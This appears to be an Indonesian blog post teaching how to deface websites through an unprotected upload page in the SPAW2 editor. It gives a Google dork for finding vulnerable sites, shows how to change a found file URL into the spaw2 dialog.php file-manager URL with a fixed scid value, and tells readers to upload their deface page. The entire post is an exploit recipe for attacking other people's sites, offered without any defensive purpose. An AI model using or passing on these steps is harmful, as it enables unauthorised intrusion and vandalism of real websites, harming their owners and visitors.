okey… tampa basa basi lagi…. saya coba menerangkan tentang cara Deface dengan Spaw Upload Vulnerably.
Cekidot….
dorknya : inurl:”spaw2/dialogs/” OR inurl:”spaw2/uploads/files/”
Jika sudah dapet targetnya…
contoh targetnya : http://target.com/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf
bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf
GANTI DENGAN
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
MAKA HASILNYA SEPERTI INI
http://target.com/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Akan tampil halaman untuk upload File.
Ganti menjadi files pada lokasi penyimpanan.
Browse file design Deface kamu, & upload.
Apabila file sukses diupload.akan terlihat file uploadtan tadi…
Tidak ada komentar:
Posting Komentar